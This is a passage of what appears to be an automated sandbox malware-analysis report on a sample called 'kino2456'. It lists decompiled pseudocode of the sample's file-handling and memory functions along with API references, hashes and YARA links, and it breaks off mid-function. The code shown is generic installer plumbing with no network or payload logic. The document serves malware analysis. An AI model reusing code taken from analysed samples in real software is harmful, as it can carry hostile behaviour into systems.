                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: a29fbabc534f2a5e2b7d2aa0689aff0b1b3f16e1b0d88ec7bc98de41e04e7ab4
                                                                                                                                                                                                                                    • Instruction ID: 80306f623fa5707970cd3585e836858fb63b4940349d7bba22ab7aeec3d35797
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a29fbabc534f2a5e2b7d2aa0689aff0b1b3f16e1b0d88ec7bc98de41e04e7ab4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0907261520CAFDB24DFF4CC48DFB7BACEB05240B44052BE855D1150EA74D914DBB2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E0096487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0096490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                    0x00964880
                                                                                                                                                                                                                                    0x0096488c
                                                                                                                                                                                                                                    0x00964894
                                                                                                                                                                                                                                    0x009648a0
                                                                                                                                                                                                                                    0x009648c9
                                                                                                                                                                                                                                    0x009648ce
                                                                                                                                                                                                                                    0x009648a2
                                                                                                                                                                                                                                    0x009648a8
                                                                                                                                                                                                                                    0x009648b7
                                                                                                                                                                                                                                    0x009648bc
                                                                                                                                                                                                                                    0x009648aa
                                                                                                                                                                                                                                    0x009648ac
                                                                                                                                                                                                                                    0x009648ac
                                                                                                                                                                                                                                    0x009648a8
                                                                                                                                                                                                                                    0x009648de
                                                                                                                                                                                                                                    0x009648e7
                                                                                                                                                                                                                                    0x0096490b
                                                                                                                                                                                                                                    0x009648ee
                                                                                                                                                                                                                                    0x009648f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964902

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00964A23,?,00964F67,*MEMCAB,00008000,00000180), ref: 009648DE
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00964F67,*MEMCAB,00008000,00000180), ref: 00964902
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: 091fd89a913e670a4060f61e6ea41640ce95f709aeb1aae7ec95acc41c78fb02
                                                                                                                                                                                                                                    • Instruction ID: 8b7c9a9612f77fa00e0b496c63b0b1ad02826e31d03eb960fdf2d71d3d9882b8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091fd89a913e670a4060f61e6ea41640ce95f709aeb1aae7ec95acc41c78fb02
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79016DA3E5557026F32441694C88FB7551CCBD6B74F1B0739FDEAE71D1D5644C0481E0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00964AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x96858c; // 0x268
				_t9 = E00963680(_t20);
				if( *0x9691d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x968d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x969400; // 0xb8200
							_t15 = _t14 + _t25;
							 *0x969400 = _t15;
							if( *0x968184 != 0) {
								_t21 =  *0x968584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9693f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                    0x00964ad5
                                                                                                                                                                                                                                    0x00964adb
                                                                                                                                                                                                                                    0x00964ae7
                                                                                                                                                                                                                                    0x00964aee
                                                                                                                                                                                                                                    0x00964b05
                                                                                                                                                                                                                                    0x00964b0d
                                                                                                                                                                                                                                    0x00964b14
                                                                                                                                                                                                                                    0x00964b1a
                                                                                                                                                                                                                                    0x00964b1c
                                                                                                                                                                                                                                    0x00964b21
                                                                                                                                                                                                                                    0x00964b2a
                                                                                                                                                                                                                                    0x00964b2f
                                                                                                                                                                                                                                    0x00964b31
                                                                                                                                                                                                                                    0x00964b39
                                                                                                                                                                                                                                    0x00964b54
                                                                                                                                                                                                                                    0x00964b54
                                                                                                                                                                                                                                    0x00964b39
                                                                                                                                                                                                                                    0x00964b2f
                                                                                                                                                                                                                                    0x00964b0f
                                                                                                                                                                                                                                    0x00964b0f
                                                                                                                                                                                                                                    0x00964b0f
                                                                                                                                                                                                                                    0x00964b5e
                                                                                                                                                                                                                                    0x00964ae9
                                                                                                                                                                                                                                    0x00964aed
                                                                                                                                                                                                                                    0x00964aed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00963680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0096369F
                                                                                                                                                                                                                                      • Part of subcall function 00963680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636B2
                                                                                                                                                                                                                                      • Part of subcall function 00963680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636DA
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00964B05
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                                                    • Opcode ID: bf3401c52d0f04ef1cd0e6885bb50039df4d50102722a6f399e2c51e8e8d9ece
                                                                                                                                                                                                                                    • Instruction ID: 7ac0c8dff2428c57d2fac7debdb58b5247a15ee4daf481d38b2b115ecfc6d891
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf3401c52d0f04ef1cd0e6885bb50039df4d50102722a6f399e2c51e8e8d9ece
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C01B131214211ABDB188FA8DC15BA6775DFB44725F148329F939A71F0CBB0D812EBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0096658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x968b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x968b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E009616B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                    0x00966592
                                                                                                                                                                                                                                    0x00966594
                                                                                                                                                                                                                                    0x00966596
                                                                                                                                                                                                                                    0x00966598
                                                                                                                                                                                                                                    0x00966598
                                                                                                                                                                                                                                    0x0096659b
                                                                                                                                                                                                                                    0x0096659b
                                                                                                                                                                                                                                    0x0096659d
                                                                                                                                                                                                                                    0x0096659e
                                                                                                                                                                                                                                    0x009665a2
                                                                                                                                                                                                                                    0x009665a4
                                                                                                                                                                                                                                    0x009665a9
                                                                                                                                                                                                                                    0x009665b2
                                                                                                                                                                                                                                    0x009665b6
                                                                                                                                                                                                                                    0x009665ba
                                                                                                                                                                                                                                    0x009665c3
                                                                                                                                                                                                                                    0x009665c5
                                                                                                                                                                                                                                    0x009665c8
                                                                                                                                                                                                                                    0x009665c8
                                                                                                                                                                                                                                    0x009665c3
                                                                                                                                                                                                                                    0x009665c9
                                                                                                                                                                                                                                    0x009665cc
                                                                                                                                                                                                                                    0x009665d2
                                                                                                                                                                                                                                    0x009665d1
                                                                                                                                                                                                                                    0x009665d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009665dc
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(00968B3E,00968B3F,00000001,00968B3E,-00000003,?,009660EC,00961140,?), ref: 009665BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                                                    • Opcode ID: 4d220838f48ff46c5834e11d250ab8c13b7336f78e84ff68164ac7e6fe46334b
                                                                                                                                                                                                                                    • Instruction ID: 13b9b386df9c0ad7f528cedec6843ccfe6e20b461c79ea1a15334fa10c99a067
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d220838f48ff46c5834e11d250ab8c13b7336f78e84ff68164ac7e6fe46334b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF04C321082509BD331491DD884B66BFDE9BC6350F28056EF8DBC3205CA659C45C7A4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0096621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x968004; // 0xf4cc89a0
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0096597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E009644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x969124 = E00966285();
					_t9 = 0;
				}
				return E00966CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                    0x00966229
                                                                                                                                                                                                                                    0x00966230
                                                                                                                                                                                                                                    0x00966247
                                                                                                                                                                                                                                    0x0096626a
                                                                                                                                                                                                                                    0x00966272
                                                                                                                                                                                                                                    0x00966249
                                                                                                                                                                                                                                    0x00966255
                                                                                                                                                                                                                                    0x0096625f
                                                                                                                                                                                                                                    0x00966264
                                                                                                                                                                                                                                    0x00966264
                                                                                                                                                                                                                                    0x00966284

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0096623F
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                                                    • Opcode ID: 90b93f52b48ba22f6162459f4bc0474612e32d8fc8030e54e5bef8453fcdb0c0
                                                                                                                                                                                                                                    • Instruction ID: 52fdfc5ed9475b6aec4979686b6e88d28ffe1f814f3e1d8dbf41cc6fa027bf28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b93f52b48ba22f6162459f4bc0474612e32d8fc8030e54e5bef8453fcdb0c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0E2B0708208BBE760EB748D02FBE37ACDB94300F40046EB996D7191EDB49D849690
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00964B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x968d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x968d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x968d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x968d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x968d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x968d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x968d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                    0x00964b66
                                                                                                                                                                                                                                    0x00964b74
                                                                                                                                                                                                                                    0x00964b98
                                                                                                                                                                                                                                    0x00964ba0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964bac
                                                                                                                                                                                                                                    0x00964ba4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964ba4
                                                                                                                                                                                                                                    0x00964b78
                                                                                                                                                                                                                                    0x00964b7e
                                                                                                                                                                                                                                    0x00964b84
                                                                                                                                                                                                                                    0x00964b8a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00964FA1,00000000), ref: 00964B98
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: 116351e94128b10cb723c1d2615db14012c66cc8ad694530e46189704303543a
                                                                                                                                                                                                                                    • Instruction ID: 4667ac9d4f53161eaeaa6b2095029296f213f503c1f02ee09893884d259a61b4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 116351e94128b10cb723c1d2615db14012c66cc8ad694530e46189704303543a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF01CB1544B089E87718F7ACD10657BBE9EAA53A07100B2FD46ED21D0FB30A881DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009666AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E009666AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                    0x009666b1
                                                                                                                                                                                                                                    0x009666ba
                                                                                                                                                                                                                                    0x009666c7
                                                                                                                                                                                                                                    0x009666bc
                                                                                                                                                                                                                                    0x009666be
                                                                                                                                                                                                                                    0x009666be

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00964777,?,00964E38,?), ref: 009666B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: 5372f4eee9453ef900d19074713b8e10dd998e6b2dfeac3e4fd96688b1afd240
                                                                                                                                                                                                                                    • Instruction ID: 4c62ad1978b9258d19ca4a31ea07b6ec33ee5b300dbde8646ec8597be38ca746
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5372f4eee9453ef900d19074713b8e10dd998e6b2dfeac3e4fd96688b1afd240
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7B0927A23A840426A200631BC295562845A7C223A7E41B94F032D01E0CA7EC856E404
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00964CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00964caa
                                                                                                                                                                                                                                    0x00964cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00964CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: 259c9b0d878409128af1a8e175560a6c5102a7e3df3e7baabe4c221844c41d4e
                                                                                                                                                                                                                                    • Instruction ID: 7c22f9da57c520dd7b9aed7677647cd817477971c3079781bd9d8edcb62a7c9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 259c9b0d878409128af1a8e175560a6c5102a7e3df3e7baabe4c221844c41d4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB0123204D20CB7CF001FC2EC09F853F1DE7C5771F140000F60C450508AB294109A96
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00964CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00964cc8
                                                                                                                                                                                                                                    0x00964ccf

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                                                    • Opcode ID: f70885694d8bf0765d3276675922ecafb69c8fbdb57e315241b14258e4774367
                                                                                                                                                                                                                                    • Instruction ID: be155006c1d6e7effd68a3451942761c4a279984c39e4827c3f9fbe9f6169489
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f70885694d8bf0765d3276675922ecafb69c8fbdb57e315241b14258e4774367
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B0123100410CB78F001B42EC088453F1DD6C12707000010F50C410218B7398119985
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00965C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E00965C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
